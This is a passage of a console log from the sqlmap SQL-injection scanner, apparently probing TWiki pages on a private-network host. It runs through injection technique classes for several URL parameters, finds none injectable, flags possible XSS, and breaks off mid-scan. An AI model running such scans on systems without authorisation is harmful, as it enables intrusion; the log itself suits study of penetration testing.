[18:57:03] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[18:57:04] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[18:57:04] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[18:57:05] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[18:57:05] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[18:57:05] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[18:57:06] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[18:57:07] [INFO] testing 'Oracle AND time-based blind'
[18:57:07] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:57:07] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[18:57:13] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[18:57:19] [WARNING] GET parameter 'skin' is not injectable
[18:57:19] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
[18:57:19] [INFO] skipping 'http://192.168.1.113/twiki/bin/view/TWiki/TWikiSkins?skin=plain'
URL 72:
GET http://192.168.1.113:80/twiki/bin/view/TWiki/TWikiMetaData?raw=debug
do you want to test this URL? [Y/n/q]
> Y
[18:57:19] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/view/TWiki/TWikiMetaData?raw=debug'
[18:57:19] [INFO] testing connection to the target URL
[18:57:20] [INFO] testing if the target URL is stable
[18:57:21] [WARNING] target URL is not stable. sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] C
[18:57:21] [INFO] testing if GET parameter 'raw' is dynamic
[18:57:21] [WARNING] GET parameter 'raw' does not appear dynamic
[18:57:21] [WARNING] heuristic (basic) test shows that GET parameter 'raw' might not be injectable
[18:57:21] [INFO] testing for SQL injection on GET parameter 'raw'
[18:57:21] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:57:22] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[18:57:22] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[18:57:23] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[18:57:23] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[18:57:24] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[18:57:24] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[18:57:24] [INFO] testing 'MySQL inline queries'
[18:57:24] [INFO] testing 'PostgreSQL inline queries'
[18:57:24] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[18:57:25] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[18:57:25] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[18:57:26] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[18:57:26] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[18:57:26] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[18:57:27] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[18:57:28] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[18:57:28] [INFO] testing 'Oracle AND time-based blind'
[18:57:29] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:57:29] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[18:57:36] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[18:57:42] [WARNING] GET parameter 'raw' is not injectable
[18:57:42] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 73:
GET http://192.168.1.113:80/twiki/bin/rdiff/TWiki/TWikiHistory?rev1=1.10&rev2=1.9
do you want to test this URL? [Y/n/q]
> Y
[18:57:42] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/rdiff/TWiki/TWikiHistory?rev1=1.10&rev2=1.9'
[18:57:42] [INFO] testing connection to the target URL
[18:57:43] [INFO] testing if the target URL is stable
[18:57:43] [INFO] target URL is stable
[18:57:43] [INFO] testing if GET parameter 'rev1' is dynamic
[18:57:45] [INFO] confirming that GET parameter 'rev1' is dynamic
[18:57:46] [INFO] GET parameter 'rev1' is dynamic
[18:57:46] [WARNING] heuristic (basic) test shows that GET parameter 'rev1' might not be injectable
[18:57:46] [INFO] heuristic (XSS) test shows that GET parameter 'rev1' might be vulnerable to XSS attacks
[18:57:46] [INFO] testing for SQL injection on GET parameter 'rev1'
[18:57:46] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:57:46] [WARNING] reflective value(s) found and filtering out
[18:57:47] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[18:57:50] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[18:57:50] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[18:57:51] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[18:57:52] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[18:57:52] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[18:57:53] [INFO] testing 'MySQL inline queries'
[18:57:54] [INFO] testing 'PostgreSQL inline queries'
[18:57:55] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[18:57:56] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[18:57:57] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[18:57:57] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[18:57:58] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[18:57:58] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[18:57:59] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[18:57:59] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[18:58:00] [INFO] testing 'Oracle AND time-based blind'
[18:58:00] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:58:00] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[18:58:07] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[18:58:14] [WARNING] GET parameter 'rev1' is not injectable
[18:58:14] [INFO] testing if GET parameter 'rev2' is dynamic
[18:58:14] [INFO] confirming that GET parameter 'rev2' is dynamic
[18:58:14] [INFO] GET parameter 'rev2' is dynamic
[18:58:15] [WARNING] heuristic (basic) test shows that GET parameter 'rev2' might not be injectable
[18:58:15] [INFO] heuristic (XSS) test shows that GET parameter 'rev2' might be vulnerable to XSS attacks
[18:58:15] [INFO] testing for SQL injection on GET parameter 'rev2'
[18:58:15] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:58:16] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[18:58:16] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[18:58:17] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[18:58:17] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[18:58:18] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[18:58:18] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[18:58:19] [INFO] testing 'MySQL inline queries'
[18:58:19] [INFO] testing 'PostgreSQL inline queries'
[18:58:19] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[18:58:19] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[18:58:20] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[18:58:20] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[18:58:21] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[18:58:21] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[18:58:21] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[18:58:22] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[18:58:23] [INFO] testing 'Oracle AND time-based blind'
[18:58:23] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:58:30] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[18:58:36] [WARNING] GET parameter 'rev2' is not injectable
[18:58:36] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 74:
GET http://192.168.1.113:80/twiki/bin/view/TWiki/TWikiHistory?rev=1.9
do you want to test this URL? [Y/n/q]
> Y
[18:58:36] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/view/TWiki/TWikiHistory?rev=1.9'
[18:58:36] [INFO] testing connection to the target URL
[18:58:37] [INFO] testing if the target URL is stable
[18:58:37] [INFO] target URL is stable
[18:58:37] [INFO] testing if GET parameter 'rev' is dynamic
[18:58:38] [INFO] confirming that GET parameter 'rev' is dynamic
[18:58:38] [INFO] GET parameter 'rev' is dynamic
[18:58:38] [WARNING] heuristic (basic) test shows that GET parameter 'rev' might not be injectable
[18:58:38] [INFO] heuristic (XSS) test shows that GET parameter 'rev' might be vulnerable to XSS attacks
[18:58:38] [INFO] testing for SQL injection on GET parameter 'rev'
[18:58:38] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:58:38] [WARNING] reflective value(s) found and filtering out
[18:58:40] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[18:58:40] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[18:58:40] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[18:58:41] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[18:58:41] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[18:58:42] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[18:58:42] [INFO] testing 'MySQL inline queries'
[18:58:42] [INFO] testing 'PostgreSQL inline queries'
[18:58:42] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[18:58:42] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[18:58:43] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[18:58:43] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[18:58:44] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[18:58:44] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[18:58:45] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[18:58:45] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[18:58:46] [INFO] testing 'Oracle AND time-based blind'
[18:58:46] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:58:46] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[18:58:53] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[18:59:00] [WARNING] GET parameter 'rev' is not injectable
[18:59:00] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
[18:59:00] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/rdiff/TWiki/TWikiHistory?rev1=1.9&rev2=1.8'
[18:59:00] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/TWiki/TWikiHistory?rev=1.8'
[18:59:00] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/rdiff/TWiki/TWikiHistory?rev1=1.8&rev2=1.7'
[18:59:00] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/TWiki/TWikiHistory?rev=1.7'
URL 75:
GET http://192.168.1.113:80/twiki/bin/oops/TWiki/TWikiHistory?template=oopsrev&param1=1.10
do you want to test this URL? [Y/n/q]
> Y
[18:59:00] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/oops/TWiki/TWikiHistory?template=oopsrev&param1=1.10'
[18:59:00] [INFO] testing connection to the target URL
[18:59:00] [INFO] testing if the target URL is stable
[18:59:01] [INFO] target URL is stable
[18:59:01] [INFO] testing if GET parameter 'template' is dynamic
[18:59:01] [INFO] confirming that GET parameter 'template' is dynamic
[18:59:01] [INFO] GET parameter 'template' is dynamic
[18:59:01] [INFO] heuristics detected web page charset 'ascii'
[18:59:01] [WARNING] heuristic (basic) test shows that GET parameter 'template' might not be injectable
[18:59:01] [INFO] heuristic (XSS) test shows that GET parameter 'template' might be vulnerable to XSS attacks
[18:59:01] [INFO] testing for SQL injection on GET parameter 'template'
[18:59:01] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:59:01] [WARNING] reflective value(s) found and filtering out
[18:59:02] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[18:59:02] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[18:59:03] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[18:59:03] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[18:59:03] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[18:59:04] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[18:59:04] [INFO] testing 'MySQL inline queries'
[18:59:04] [INFO] testing 'PostgreSQL inline queries'
[18:59:04] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[18:59:04] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[18:59:04] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[18:59:05] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[18:59:05] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[18:59:05] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[18:59:06] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[18:59:06] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[18:59:07] [INFO] testing 'Oracle AND time-based blind'
[18:59:07] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:59:07] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[18:59:12] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[18:59:16] [WARNING] GET parameter 'template' is not injectable
[18:59:16] [INFO] testing if GET parameter 'param1' is dynamic
[18:59:16] [WARNING] GET parameter 'param1' does not appear dynamic
[18:59:16] [WARNING] heuristic (basic) test shows that GET parameter 'param1' might not be injectable
[18:59:16] [INFO] heuristic (XSS) test shows that GET parameter 'param1' might be vulnerable to XSS attacks
[18:59:16] [INFO] testing for SQL injection on GET parameter 'param1'
[18:59:16] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:59:17] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[18:59:17] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[18:59:18] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[18:59:18] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[18:59:19] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[18:59:19] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[18:59:19] [INFO] testing 'MySQL inline queries'
[18:59:19] [INFO] testing 'PostgreSQL inline queries'
[18:59:20] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[18:59:20] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[18:59:20] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[18:59:20] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[18:59:21] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[18:59:21] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[18:59:22] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[18:59:22] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[18:59:22] [INFO] testing 'Oracle AND time-based blind'
[18:59:23] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:59:28] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[18:59:34] [WARNING] GET parameter 'param1' is not injectable
[18:59:34] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 76:
GET http://192.168.1.113:80/twiki/bin/edit/TWiki/TWikiDocumentation?t=1441456817
do you want to test this URL? [Y/n/q]
> Y
[18:59:34] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/edit/TWiki/TWikiDocumentation?t=1441456817'
[18:59:34] [INFO] testing connection to the target URL
[18:59:34] [INFO] testing if the target URL is stable
[18:59:35] [INFO] target URL is stable
[18:59:35] [INFO] testing if GET parameter 't' is dynamic
[18:59:35] [WARNING] GET parameter 't' does not appear dynamic
[18:59:35] [WARNING] heuristic (basic) test shows that GET parameter 't' might not be injectable
[18:59:35] [INFO] testing for SQL injection on GET parameter 't'
[18:59:35] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:59:36] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[18:59:36] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[18:59:37] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[18:59:37] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[18:59:38] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[18:59:38] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[18:59:38] [INFO] testing 'MySQL inline queries'
[18:59:39] [INFO] testing 'PostgreSQL inline queries'
[18:59:39] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[18:59:39] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[18:59:39] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[18:59:39] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[18:59:40] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[18:59:40] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[18:59:41] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[18:59:41] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[18:59:42] [INFO] testing 'Oracle AND time-based blind'
[18:59:42] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:59:42] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[18:59:48] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[18:59:55] [WARNING] GET parameter 't' is not injectable
[18:59:55] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 77:
GET http://192.168.1.113:80/twiki/bin/search/TWiki/SearchResult?scope=text&regex=on&search=TWiki *Documentation[^A-Za-z]
do you want to test this URL? [Y/n/q]
> Y
[18:59:55] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/search/TWiki/SearchResult?scope=text&regex=on&search=TWiki *Documentation[^A-Za-z]'
custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y
[18:59:55] [INFO] testing connection to the target URL
[18:59:55] [INFO] testing if the target URL is stable
[18:59:56] [INFO] target URL is stable
[18:59:56] [INFO] testing if URI parameter '#1*' is dynamic
[18:59:56] [INFO] confirming that URI parameter '#1*' is dynamic
[18:59:56] [INFO] URI parameter '#1*' is dynamic
[18:59:56] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable
[18:59:56] [INFO] testing for SQL injection on URI parameter '#1*'
[18:59:56] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:59:57] [WARNING] reflective value(s) found and filtering out
[18:59:58] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[18:59:59] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[18:59:59] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[19:00:00] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[19:00:00] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[19:00:01] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[19:00:01] [INFO] testing 'MySQL inline queries'
[19:00:01] [INFO] testing 'PostgreSQL inline queries'
[19:00:01] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[19:00:02] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[19:00:02] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[19:00:03] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[19:00:03] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[19:00:04] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[19:00:04] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[19:00:05] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[19:00:06] [INFO] testing 'Oracle AND time-based blind'
[19:00:06] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[19:00:06] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[19:00:13] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[19:00:18] [WARNING] URI parameter '#1*' is not injectable
[19:00:18] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 78:
GET http://192.168.1.113:80/twiki/bin/view/TWiki/TWikiDocumentation?skin=print
do you want to test this URL? [Y/n/q]
> Y
[19:00:18] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/view/TWiki/TWikiDocumentation?skin=print'
[19:00:18] [INFO] testing connection to the target URL
[19:00:21] [INFO] testing if the target URL is stable
[19:00:22] [WARNING] target URL is not stable. sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] C
[19:00:23] [INFO] testing if GET parameter 'skin' is dynamic
[19:00:24] [WARNING] GET parameter 'skin' does not appear dynamic
[19:00:24] [INFO] heuristics detected web page charset 'ascii'
[19:00:24] [WARNING] heuristic (basic) test shows that GET parameter 'skin' might not be injectable
[19:00:26] [INFO] heuristic (XSS) test shows that GET parameter 'skin' might be vulnerable to XSS attacks
[19:00:26] [INFO] testing for SQL injection on GET parameter 'skin'
[19:00:26] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:00:26] [WARNING] reflective value(s) found and filtering out
[19:00:44] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[19:00:49] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[19:00:55] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[19:01:01] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[19:01:06] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[19:01:11] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[19:01:12] [INFO] testing 'MySQL inline queries'
[19:01:13] [INFO] testing 'PostgreSQL inline queries'
[19:01:15] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[19:01:16] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[19:01:19] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[19:01:23] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[19:01:26] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[19:01:30] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[19:01:34] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[19:01:38] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[19:01:43] [INFO] testing 'Oracle AND time-based blind'
[19:01:47] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[19:01:47] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[19:03:36] [WARNING] there is a possibility that the target (or WAF) is dropping 'suspicious' requests
[19:03:36] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
[19:05:42] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[19:06:50] [WARNING] GET parameter 'skin' is not injectable
[19:06:50] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 79:
GET http://192.168.1.113:80/twiki/bin/rdiff/TWiki/TWikiDocumentation?rev1=1.44&rev2=1.43
do you want to test this URL? [Y/n/q]
> Y
[19:06:50] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/rdiff/TWiki/TWikiDocumentation?rev1=1.44&rev2=1.43'
[19:06:50] [INFO] testing connection to the target URL
[19:06:50] [INFO] testing if the target URL is stable
[19:06:51] [INFO] target URL is stable
[19:06:51] [INFO] testing if GET parameter 'rev1' is dynamic
[19:06:51] [WARNING] GET parameter 'rev1' does not appear dynamic
[19:06:51] [WARNING] heuristic (basic) test shows that GET parameter 'rev1' might not be injectable
[19:06:51] [INFO] heuristic (XSS) test shows that GET parameter 'rev1' might be vulnerable to XSS attacks
[19:06:51] [INFO] testing for SQL injection on GET parameter 'rev1'
[19:06:51] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:06:52] [WARNING] reflective value(s) found and filtering out
[19:06:53] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[19:06:53] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[19:06:54] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[19:06:54] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[19:06:55] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[19:06:55] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[19:06:55] [INFO] testing 'MySQL inline queries'
[19:06:56] [INFO] testing 'PostgreSQL inline queries'
[19:06:56] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[19:06:56] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[19:06:56] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[19:06:57] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[19:06:57] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[19:06:58] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[19:06:58] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[19:06:59] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[19:06:59] [INFO] testing 'Oracle AND time-based blind'
